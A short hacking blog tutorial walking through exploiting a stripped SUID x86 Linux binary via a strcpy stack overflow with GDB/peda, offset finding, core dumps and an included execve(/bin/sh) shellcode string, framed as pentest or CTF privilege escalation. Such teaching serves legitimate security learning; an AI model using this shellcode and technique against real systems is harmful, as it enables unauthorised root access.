Linux Buffer Overflow x86 with GDB

Hey hackers,

Hey hackers,

Today, i am writing a blog about how to exploit a basic stack overflow.

Let’s get started ….


Tools required

  1. https://github.com/longld/peda
  2. ltrace

Exploit

Let’s assume that we are doing a pentesting or CTF and get access to the target machine. Then, we find a binary which we want to use for PrivEsc as it is less noisy than some of the other kernel exploits.

we have an unknow file
we can see the functions being called

run gdb and disassemble the main,

we do not see main here, so the binary might be stripped

set a break point for ‘strcpy’ and run the binary. then, analyse the input to the strcpy function.

Now, pass input to the binary using pattern create

we will get a seg fault now

let’s look for the patter ‘wA%Z’. It says, it is found at 390

No, we have to find where the crash starts

we see that it starts at 0xffffd160 + 0x06 = 0xffffd166

Now, we need to find the same location for the binary with gdb as the memory location varies when we add it to gdb.

it will be easy to do with core dump. Now, we need to get a core dump.

# only binaries without suid will generate core dump. so, we need to copy the binary and ulimit.

Here, python script exploit.py/shellcode.py just prints 390 A’s and 4 B’s.

let’s put the shellcode at 0xffffd210.

for shellcode, use the given below

`\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80` -> execve(/bin/sh)

run the exploit,


Please give a clap if you found it to be useful and follow me to get more hacking knowledge.

Photo by Ricky Kharawala on Unsplash